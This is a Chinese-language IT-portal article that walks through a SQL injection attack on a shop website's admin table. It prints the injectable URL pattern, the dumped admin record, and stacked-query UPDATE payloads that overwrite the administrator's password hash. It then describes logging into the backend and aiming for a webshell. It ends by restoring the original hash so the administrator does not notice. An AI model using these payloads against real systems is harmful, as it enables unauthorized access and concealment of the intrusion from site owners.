| 网站首页 | IT资讯 | 电影 | 软件 | 图片壁纸 | 留言 | 商城 | 英语 | 站长赚钱 | 论坛 | 
您现在的位置: IT学习者联盟 >> IT资讯 >> 操作系统 >> linux、Vista >> 文章正文 用户登录 新用户注册
注射修改系统管理员密码实用技巧            【字体:
注射修改系统管理员密码实用技巧
作者:佚名    文章来源:不详    点击数:    更新时间:2008-5-24
  注入点已经找到:xxx.com/book.asp?id=1996 我刚已经用NB检测过了。可以看到,存在表段 shop_admin。   可是密码是MD5加密的:[adminid]:24 [admin]:zhuyaod [password]:d4716077c2ba075c 我们来尝试欺骗。可以看出,欺骗是没戏滴。 那咋办?难道要跑密码?那得浪费多少时间和内存啊?   下面我来介绍一种新方法:注射。注射的语句如下: ;update shop_admin set password=’新MD5加密密码’ where password=’d4716077c2ba075c’-- 比如,我需要把zhuyaod的密码改成wmmhacker,我们首先要先获得wmmhacker通过MD5加密后的十二位密码 这里用明小子的工具就能转换了。wmmhacker - f8dc763194f29433 ;update shop_admin set password=’f8dc763194f29433’ where password=’d4716077c2ba075c’-- 我们来测试。看见了,页面没有返回错误,表示成功了。   现在我们对shop_admin表段下的密码做重新解猜。 [adminid]:24 [admin]:zhuyaod [password]:f8dc763194f29433 大家对比一下,已经改变了。现在我们可以登陆了。 进来了。呵呵。就到这里了吧。值得提一句的是,我们进了后台,然后想办法拿到WEBSHELL。   接着,别忘了把管理员密码还原。不然他会发现滴! ;update shop_admin set password=’d4716077c2ba075c’ where password=’f8dc763194f29433’--
文章录入:冷雨    责任编辑:冷雨 
  • 上一篇文章:

  • 下一篇文章:
  • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    最新热点 最新推荐 相关文章
    病毒导致输入法无效的处理方
    安装SP3后系统蓝屏(BSoD)解决
    乾坤大挪移:数据转移技巧(下
    为操作系统文件夹添加背景音
    取消操作系统烦人的驱动程序
    Vista笔记本散热消热终极大法
    Vista下无法打开摄像头解决方
    轻松为Vista的系统盘空间减压
    不重装 不还原 让Vista比重装
    设置缓存文件位置 释放系统盘
    冀ICP备05008378号 Copyright 2005-2008 All Rights Reserved IT学习者联盟 Email: 信手涂鸦